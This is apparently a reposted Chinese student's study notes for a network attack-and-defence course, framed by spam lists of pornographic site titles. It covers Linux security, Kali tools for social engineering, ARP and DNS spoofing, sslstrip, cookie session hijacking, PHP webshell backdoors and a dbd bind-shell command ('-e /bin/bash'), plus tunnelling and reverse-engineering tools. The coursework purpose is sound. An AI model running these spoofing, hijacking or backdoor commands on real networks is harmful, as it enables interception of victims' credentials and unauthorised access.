日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

2017-2018-2 20179204《网络攻防实践》第八周学习总结

發布時間:2025/7/14 编程问答 15 豆豆
生活随笔 收集整理的這篇文章主要介紹了 2017-2018-2 20179204《网络攻防实践》第八周学习总结 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

第1節 教材學習內容總結

本周學習了教材第八章的內容。

1.1 linux操作系統基本框架概述

發展出眾多操作系統發行版:ubuntu、debian、fedora、centos、rhel、opensuse和stackware等。

  • 優勢

    開放源代碼與免費跨平臺的硬件支持豐富的軟件支持多用戶多任務可靠的安全性良好的穩定性完善的網絡功能
  • linux系統結構(課本圖8-1)

    Linux進程與線程管理機制Linux內存管理機制Linux文件系統管理機制Linux設備控制機制Linux網絡機制Linux系統調用機制

1.2 linux操作系統安全機制

linux操作系統的核心安全機制主要是身份認證、授權與訪問控制、安全審計三個部分。

  • linux身份認證

    linux用戶(root根用戶、普通用戶、系統用戶)linux用戶組(具有相同特征的用戶賬號集合)linux本地登錄用戶認證機制(控制臺)linux遠程登錄用戶認證機制(ssh服務)Linux的統一身份認證中間件——PAM(可插入身份認證模塊)
  • linux授權與訪問控制

    文件所有者(chown命令)文件的訪問權限(讀、寫、執行,chmod命令)文件的特殊執行權限Linux訪問控制機制的不足與改進
  • linux安全審計

主要通過三個主要的日志子系統來實現(p284 表8-1):

連接時間日志進程統計日志錯誤日志記錄

1.3 linux系統遠程攻防技術

  • linux遠程口令字猜測攻擊

1)針對ssh、telnet、ftp、http等服務的口令猜測攻擊是互聯網所面臨的攻陷系統最普遍的攻擊模式。

2)自動化遠程口令猜測工具(brutus、thc hydra、cain and abel) p286

3)最佳防御措施:使用不宜猜中的強口令字

  • linux網絡服務遠程滲透攻擊

最重要的攻擊渠道——對監聽網絡服務安全漏洞的滲透利用。

Linux網絡服務的遠程滲透攻擊Linux內核中的網絡協議棧實現LAMP Web網站構建解決方案中的網絡服務FTP、Samba等文件共享服務電子郵件收發服務其他網絡服務

安全防范措施:

禁用所有不必要的網絡服務盡量選擇更安全的網絡協議與服務軟件,并使用最佳安全實踐進行部署及時更新網絡服務版本使用xinetd、防火墻為linux網絡服務添加網絡訪問控制機制建立入侵檢測與應急響應計劃流程
  • 攻擊Linux客戶端程序和用戶
    安全防范措施:

    及時更新常用的網絡客戶端軟件自身安全意識、經驗與心智能力
  • 攻擊Linux路由器和監聽器

    攻擊linux路由器與防火墻攻擊監聽器&入侵檢測器(libpcap抓包庫、tcpdump命令行程序、wireshark網絡監聽與協議分析軟件、snort入侵檢測系統)

1.4 linux系統本地安全攻防技術

  • linux本地特權提升

    linux用戶口令字破解利用sudo的缺陷進行特權提升利用用戶態SUID程序漏洞進行特權提升針對SUID程序的本地緩沖區溢出攻擊針對SUID程序的符號鏈接攻擊針對SUID程序的競爭條件攻擊針對SUID程序的共享函數庫攻擊利用內核空間代碼漏洞進行特權提升利用系統配置不當實施本地特權提升
  • linux系統上的消蹤滅跡

清理系統上的日志記錄,從而有效地抹掉自己的行動蹤跡。

  • linux系統遠程控制后門程序

linux系統上植入遠程控制后門程序的類型有:特洛伊木馬化的系統程序、命令行后門工具以及圖形化后門工具。

第2節 網絡攻防環境的搭建與測試

linux攻擊機10.43.43.72 linux靶機10.43.33.155win攻擊機10.43.33.108 win靶機10.43.32.208

基于蜜網的攻防環境搭建見2017-2018-2 20179204《網絡攻防實踐》第二周學習總結 第3節 教材學習實踐。

第3節 kali視頻(31-35)學習

31.Kali漏洞利用之SET

Social Engineering Toolkit(SET)是一個開源、Python驅動的社會工程學滲透測試工具。提供了非常豐富的攻擊向量庫。是開源的社會工程學利用套件,通常結合metasploit來使用。

  • 命令行下輸入setoolkit打開SET套件
  • 菜單選項1是社會工程學攻擊,輸入1回車,可以看到相應模塊

    1)魚叉式釣魚攻擊(Spear-Phishing Attack Vectors)2)網站攻擊(Website Attack Vectors)3)介質感染攻擊(Infectious Media Generator)4)創建Payload并監聽(Create a Payload and Listener)5)群發郵件攻擊(Mass Mailer Attack)6)基于Arduino的攻擊(Arduino-Based Attack Vector)7)無線接入點攻擊(Wireless Access Point Attack Vector)8)二維碼攻擊(QRCode Generator Attack Vector)9)powershell攻擊(Powershell Attack Vectors)10)短信欺騙攻擊(SMS Spoofing Attack Vector)11)第三方模塊(Third Party Modules)
  • 魚叉式釣魚攻擊

此攻擊向量主要目的為發送存在惡意軟件的釣魚郵件。
相應的Payload可以選擇不同的漏洞。

  • 網站攻擊框架

此時可以開放一個WEBSever服務,如果對方訪問此頁面,若系統存在漏洞觸發條件,則會被植入后門。
如Java Applet Attack方法就是需要目標有Java運行環境,為了仿真,可以選擇自建模板或克隆一個網站。

  • 介質感染攻擊:借助Autorun.inf執行Exploit得到一個返回的shell,也可以結合Metasploit的后門。

  • 創建Payload和監聽器listener

  • 群發郵件攻擊:支持導入列表并向列表中的每個人發送郵件。

  • 基于Andruino的攻擊

  • 無線接入點攻擊(Wireless Access Point Attack Vector):無線接入點攻擊會創建一個虛擬無線AP,通過接入點ap可以抓取所有連接進來的設備流量。

  • 二維碼攻擊(QRCode Generator Attack Vector):填入一個危險的URL,使得被攻擊者掃描二維碼自動訪問頁面而中招。

  • powershell攻擊(Powershell Attack Vectors):針對vista以上的攻擊模塊。
  • 短信欺騙攻擊(SMS Spoofing Attack Vector):偽造短信的來源。

  • 第三方模塊(Third Party Modules)

32.Kali嗅探欺騙與中間人攻擊

Linux下的中間人攻擊套路都是一樣的,這里介紹進行ARP欺騙、DNS欺騙和嗅探以及會話劫持(cookies)的方法。

  • 為kali設置開啟端口轉發
    echo 1 > /proc/sys/net/ipv4/ip_forward

  • 設置ssltrip
    為了劫持ssl數據,需要使https數據變為http:
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8081

  • 讓sslstrip在8081端口監聽:ssltrip -l 8081
  • ettercap

ettercap是一套用于中間人攻擊的工具。和dsniff套件齊名。支持插件和過濾腳本,直接將賬號、密碼顯示出來,不用人工提取數據。如果是第一次中間人攻擊操作,那么要對kali下的etteracp做點配置。

1)配置文件是/etc/ettercap/etter.conf,首先要將ec_uid、ec_gid都變為0。

2)然后找到linux分類下的if you use iptables這一行,將下面兩行的注釋(“#”號)去掉,打開轉發。

3)打開圖形化界面 ettercap -G
4)選擇嗅探網卡 默認eth0

5)Ettercap使用
打開ettercap,選擇hosts選項:先scan for hosts,等掃描完了選host list。

將網關add to target 1/想攻擊的目標add to target 2,mitm選項卡arppoisoning,然后start sniffing。

靶機:





當同處一個局域網的受害者訪問網頁,進行登錄時,它的密碼就被記錄了,不安全的連接。

查看被監聽主機之間的所有連接信息,依次點擊View--Connections。

  • Dsniff套裝介紹

Dsniff套裝主要是arpspoof和dsniff,前者用來進行arp欺騙,后者用于嗅探。進行攻擊步驟如下:

1)進行arp欺騙

arpspoof [-i interface(網卡)] [-c own|host|both(欺騙方式,通常是both)] [-t target(目標)] [-r] host(網關)

2)進行嗅探

dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen] [-f services] [-t trigger[,...]] [-r|-w savefile] [expression]

-c打開半雙工TCP流,允許在使用arpspoof時進行正確的嗅探操作;-d啟動調試模式;-f以/etc/service格式從文件中加載觸發器(也就是口令嗅探的服務類型);-I使用特定的網絡接口;-m使用dsniff.magic文件通過在magic文件中定義的特征嘗試自動判斷協議;-n不執行主機查找;-r從前面保存的會話中讀取被嗅探的數據;-s最多對報文的前個字節進行嗅探,如果用戶名和口令信息包含在隨后的默認1024字節界限中;-t使用格式port/proto=servise;來加載一個以逗號界定的觸發器集;
  • 會話劫持

這里主要以cookies進行舉例,說明會話劫持的用法。

1)開始arp欺騙:arpspoof -i wlan0 -t 192.168.1.1 192.168.1.102

2)捕獲數據報:tcpdump -i wlan -w test.cap
等一段時間,估計目標會登錄網站了,我們開始處理捕獲的數據包:forret -r test.cap。

3)如果捕獲的數據包沒什么問題,而且確定開啟了端口轉發,那么經過處理的數據包會自動生成hamster.txt
接下來運行hamster hamster,會提示瀏覽器設置代理為http://127.0.0.1:1234

4)接著在瀏覽器中代開hamster:http://hamster
選擇目標和可能的登錄認證地址,然后點擊鏈接會發現劫持成功。

  • 圖片截獲

利用Driftnet這款工具我們可以看到受害人在訪問網站的圖片。

首先依然使用arpspoof啟動arp欺騙,然后啟動driftnet:driftent -i。

此時彈出一個小窗口,當目標訪問有圖片的網站的時候,攻擊者就能在這個小窗口看到。

  • DNS欺騙

利用Dsniff套裝中的dnsspoof或者ettercap的dnsspoof插件,我們可以完成對受害者的dns欺騙。

1)在開始欺騙前,首先我們要編輯一個自己的hosts文件,放在方便訪問的地方。內容和本機自帶的hosts內容差不多,只是把你想欺騙的域名和想要欺騙到哪里的地址寫好(通常是攻擊者指定的服務器,用來執行瀏覽器溢出或者java applet攻擊,用來獲取受害者的計算機訪問權限)

2)host文件:127.0.0.1 www.baidu.com。上面是一個hosts文件示例,把百度定向到了本機。我們把它保存成hosts,位于/root目錄下。

3)然后啟動dnsspoof:dnsspoof -i wlan0 -f /root/hosts,等受害者訪問百度觀察效果。

  • URL監控

利用Dsniff套裝中的urlsnarf工具,我們對TCP80、3128、8080端口的HTTP通信進行解析,并且可以將嗅探到的所有HTTP請求轉存為通用日志格式(Common Log Format,CLF),這種格式是許多Web服務器所使用的,例如IIS和Apache,事后可以很方便的使用一些日志分析工具來分析記錄結果。

Usage:urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]

  • 下載軟件監控

利用Dsniff套裝中的filesnarf工具,我們可以從嗅探到的NFS通信中,選定某個文件,轉存到本地當前工作目錄。

Ussage:filesnarf [-i interface | -p pcapfile] [[-v] pattern [expression]]

33.Kali權限維持之后門

權限維持包含Tunnel工具集、Web后門、系統后門三個子類。其中系統后門與web后門統稱后門,都是為滲透測試后,為方便再次進入系統而留下的惡意程序。

  • Weevely

Weevely是一款使用python編寫的webshell工具,可以算作是linux下的一款菜刀替代工具(限于php)。

1)生成后門

2)上傳后門,使用weevely連接。

  • WeBaCoo

WeBaCoo(Web Backdoor Cookie)script-kit是一個小巧的、隱蔽的php后門,它提供了一個可以連接遠程web服務器并執行php代碼的終端。WeBaCoo使用HTTP響應頭傳送命令結果,shell命令經base64編碼后隱藏在Cookie頭中。

1)生成后門webacoo -g -o ~/2.php

2)連接后門webacoo -t -u http://xxx.xxx.xxx.xxx/2.php。

通過加入“:”執行本地命令,不加則借助webshell執行命令。

  • dbd

加密版的nc
監聽端:dbd -l -p 2333 -e /bin/bash -k password
連接端:dbd 127.0.0.1 2333 -k password

  • sbd

  • U3-Pwn

與Metasploit Payload結合使用工具,從菜單可以單刀多針對移動設備如光驅鏡像、U盤等。

  • Intersect

1)使用“2”列出可以使用的模塊

2)創建后門腳本使用“1”,自由添加功能組件,生成shell。



3)綁定

4)連接:nc nvv 127.0.0.1 5555

34.Kali權限維持之Tunnel

權限維持包含Tunnel工具集、Web后門、系統后門三個子類。Tunnel工具集包含了一系列用于創建通信隧道、代理的工具。

  • cryptcat

  • DNS2TCP

什么是DNS Tunnel?原理是什么?

  • Miredo

Miredo是一個網絡工具,主要用于BSD和Linux的IPV6 Teredo隧道鏈接,可以轉換不支持IPV6的網絡連接IPV6,內核中需要有IPV6和TUN隧道支持。

  • Proxytunnel

Proxytunnel可通過標準的HTTPS代理來連接遠程服務器,這是一個代理,實現了橋接的功能。特別用于通過SSH進行HTTP(S)傳輸。

  • ptunnel

借助icmp數據包建立隧道通信。

  • pwnat

內網下通過udp通信。

  • socat

可以在不同協議上進行轉發數據。

  • sslh

是一個ssl/ssh端口復用工具,sslh可以在同一個端口上接受https,ssh和openvpn連接,這使得通過443端口連接ssh服務器或者openvpn服務同時在該端口上提供https服務成為可能,sslh可以作為一個研究端口復用的例子。

35.Kali逆向工程工具

逆向工程是根據已有的東西和結果,通過分析來推導出具體的實現辦法。比如看到別人寫的某個exe程序能夠做出某種漂亮的動畫效果,你通過反匯編、反編譯和動態跟蹤等方法,分析出其動畫效果的實現過程,這種行為就是逆向工程:不僅僅是反編譯,而且還要推導出設計,并且文檔化,逆向軟件工程的目的是使軟件得以維護。

  • edb-debugger

圖形化界面,基于qt4開發的二進制調試工具,主要是為了跟ollydbg工具看齊,通過插件體系可進行功能的擴充。

  • Ollydbg
  • Jad——一個Java反編譯工具
  • Radare2

radare2是一款開放源代碼的逆向工程平臺,它可以反匯編、調試、分析和操作二進制文件。

  • Recstudio——反編譯工具
  • Apktool

APKTool是google提供的APK編譯工具,能夠反編譯及回編譯apk,同時安裝反編譯系統apk所需要的framewo-res框架。

  • Clang 、Clang++

Clang是一個C怨言、C++、Objective C、Objective C++語言的輕量級編譯器。

  • D2j-dex2jar

反編譯dex文件到jar文件,進而可以用其他工具查看源代碼。

  • Flasm

flasm主要功能是用于直接修改swf文件里的腳本actionscript。

  • Javasnoop

Javasnoop是一個java應用程序安全測試工具,它允許你以攔截的方法,篡改數據和hack運行在你計算機上的java應用程序。通常在沒有源代碼的情況下,測試java客戶端的安全性最好的結果是不可預知的,最壞的結果是不切實際的。

轉載于:https://www.cnblogs.com/20179204gege/p/8941525.html

總結

以上是生活随笔為你收集整理的2017-2018-2 20179204《网络攻防实践》第八周学习总结的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 亚洲自拍三区 | 国产成人福利在线 | 中文久草 | 国产三级午夜理伦三级 | 一卡二卡三卡四卡五卡 | 秋霞毛片 | 中文字幕日韩一区二区三区不卡 | 91精品国产91久久久久久久久久久久 | 亚洲AV综合色区国产精品天天 | www视频在线观看免费 | 婷婷中文网 | 国产草草草 | 最近中文字幕免费视频 | 欧美色图激情小说 | ass日本寡妇pics| 免费网站观看www在线观 | 脱裤吧导航 | 影音先锋人妻啪啪av资源网站 | 午夜爱爱网| 91视频看| 日韩在线资源 | 福利视频在线看 | 亚洲啪视频| 操欧美女人| 精品久久久久中文慕人妻 | 午夜视频色| 一极毛片 | 国产日韩欧美电影 | 亚欧美精品 | 国产成人小视频在线观看 | 禁止18在线观看 | 天堂中文字幕在线 | 野外吮她的花蒂高h在线观看 | 欧美性大战久久久久久久蜜桃 | 久久大奶 | 性一交一乱一区二区洋洋av | 在线观看欧美精品 | 激情综合av| 99成人国产精品视频 | 欧美另类极品videosbest使用方法 | 麻豆精品国产传媒 | av十大美巨乳 | 天堂av日韩| 国产精品久久久久毛片软件 | 日韩欧美黄 | 国产一区二区黄色 | 福利综合网 | 超碰色人阁 | 亚洲精品中文无码AV在线播放 | 国产第20页 | 黄色91在线观看 | 亚洲一区久久久 | 久久久久久久久久久久97 | 日本在线观看视频网站 | 天天综合中文字幕 | 一区精品视频 | 三级黄色片网站 | 91久| 噜噜噜在线视频 | 国产一国产精品一级毛片 | 91大神久久 | 青青青网| 六月婷婷七月丁香 | 动漫av在线免费观看 | 亚洲国产一区在线 | 杏导航aⅴ福利网站 | 亚洲欧洲精品在线 | 欧美做爰全过程免费看 | 91精品一区二区 | 免费在线黄色片 | 成人欧美一区二区三区黑人孕妇 | av首页在线观看 | 天天干夜夜想 | 欧美日韩国产综合在线 | 国产精品成人在线 | 久久久视频在线观看 | 国产精品老熟女视频一区二区 | 午夜有码 | 成人网站免费观看入口 | 亚洲精品7777 | 成人小视频在线看 | 欧美日韩精品在线 | 波多野结衣网站 | 国产一区精品在线 | 黄色片地址 | 国产内射一区二区 | 国产无码久久精品 | 午夜在线观看影院 | mm1313亚洲国产精品无码试看 | 国产美女极度色诱视频www | 日韩一级片在线观看 | 欧美黄色录像带 | 欧美精品国产一区 | 美女视频久久 | 午夜精品偷拍 | 欧美精品一区二区三区久久久竹菊 | 小日子的在线观看免费第8集 | 国产我不卡 | 精品66|